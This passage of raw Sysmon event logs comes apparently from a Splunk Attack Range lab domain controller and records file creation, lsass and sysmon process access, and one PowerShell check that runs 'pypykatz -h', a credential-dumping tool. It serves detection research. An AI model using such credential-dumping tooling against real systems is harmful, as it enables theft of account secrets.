Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2020-11-03 15:52:55.945 11241100x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.929{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2020-11-03 15:52:55.929 11241100x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:55.836{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2020-11-03 15:52:55.836 10341000x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.820{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.820{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.820{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2020-11-03 15:52:55.804 11241100x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2020-11-03 15:52:55.804 11241100x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2020-11-03 15:52:55.804 11241100x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2020-11-03 15:52:55.804 11241100x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2020-11-03 15:52:55.804 11241100x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2020-11-03 15:52:55.804 11241100x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:55.804{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2020-11-03 15:52:55.804 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD7-5FA1-E800-000000008801}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD7-5FA1-E800-000000008801}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.069{D28789B6-7CD6-5FA1-E700-000000008801}28923548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD7-5FA1-E800-000000008801}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44fa3d8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44444c15|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+444448e6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44ef5f4b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+4440547c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+4446394b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44446fb0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44446fb0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44446fb0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44446e41|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44438dc6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+444452f9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44444e95|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44444c15|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+444448e6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+44ef5f4b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+4440547c 154100x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.073{D28789B6-7CD7-5FA1-E800-000000008801}2508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c pypykatz -hC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (cmd /c pypykatz -h) {exit 0} else {exit 1}} 10341000x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.006{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:55.006{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E700-000000008801}2892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.555{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 